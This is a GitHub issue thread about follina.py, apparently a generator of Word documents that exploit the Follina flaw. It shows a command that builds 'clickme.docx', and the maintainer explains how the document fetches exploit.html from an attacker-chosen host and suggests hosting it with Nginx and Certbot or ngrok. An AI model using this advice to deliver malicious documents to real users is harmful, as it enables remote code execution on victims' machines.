### ISSUE TITLE
-u doesn't seem to do anything

### ISSUE THREAD

**Issue by aidenmitchell** [chvancooten/follina.py#4]
Hi there, I'm hoping to use this script to generate a Word document that gets the payload from a remote URL. 

As mentioned in the docs, you can use `-u` to specify a URL, but it doesn't seem to do anything, the generated document still tries to reach out to `localhost`.

**Comment by aidenmitchell** [comment]
Example command:
```
python3 follina.py -u https://follina.pages.dev/payload
Generated 'clickme.docx' in current directory
Serving payload on http://localhost/exploit.html
```

**Comment by chvancooten** [comment]
Hey! That was a quick report :)
The `-u` option is fairly simple currently in that it only accepts a hostname or IP address. E.g., specifying `-u follina.pages.dev` would have the maldoc retrieve the payload at `http://follina.pages.dev:80/exploit.html`. This behavior is fairly simple, but I didn't go through the effort of making everything dynamic or supporting HTTPS yet, for that matter 🙃 PRs are of course very welcome

**Comment by aidenmitchell** [comment]
Fair enough, sounds good. I'll see if I can get working on a PR. Thanks for the quick reply!
If it's ok with you, I'll keep this issue open, and close it with the PR (link them together sort of deal.)

**Comment by chvancooten** [comment]
Works for me! An alternative (if you don't want to get into the dev work) would be to simply take the generated `www/exploit.html` file and host it using something like Nginx with Certbot for SSL.

**Comment by Karewen** [comment]
Will it work if I host the www/exploit.html using ngrok?
